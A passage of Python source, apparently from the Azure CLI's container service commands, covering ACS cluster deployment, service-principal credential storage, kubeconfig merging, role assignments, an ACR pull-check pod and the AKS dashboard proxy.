windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
        'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
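        # wire the service principal into the cluster and pass its secret as a secureString deployment
        # parameter instead of inlining it in the template body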
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
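    # restrict the file to owner read/write (0600) since it stores the client secret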
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
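    # incremental mode only adds or updates the resources described in this template and leaves other resources in the group untouched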
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
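    # avoid clobbering an existing kubeconfig: copy to a '<path>-<name>-<n>' side file first and merge it back below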
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
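    # merge one list-valued kubeconfig section (clusters/users/contexts): entries with new names are appended;
    # on a name collision the existing entry is replaced when 'replace' is set or the entries are identical,
    # otherwise the user is prompted (and an error is raised when no TTY is available)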
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    # guard against a failed load before indexing into the addition
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
    Gets a random string of length n drawn from lowercase letters and digits.
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cmd.cli_ctx, assignee) if resolve_assignee else assignee
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
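    # resolution order: user principal name (contains '@'), then service principal name, then assume an object id and verify it exists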
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
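    # GUID of the built-in 'Network Contributor' role definition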
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
                           'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for '
'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
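    # run a one-off diagnostic pod on a Linux node (host network, root, with the node's /etc/kubernetes
    # and CA certificates mounted) so it can validate pull access to the given ACR using the cluster's credentials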
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
        # Support kubectl versions < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
return output
raise AzureInternalError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
        dashboard_port = int(dashboard_port.replace("'", ""))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
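    # the dashboard is reached through the local kubectl proxy, via the API server's service proxy path for the kubernetes-dashboard service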
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", None):
timeout = test_configs.get("timeoutInterval", 10)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
            if 'unknown flag: --address' in err.output:
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
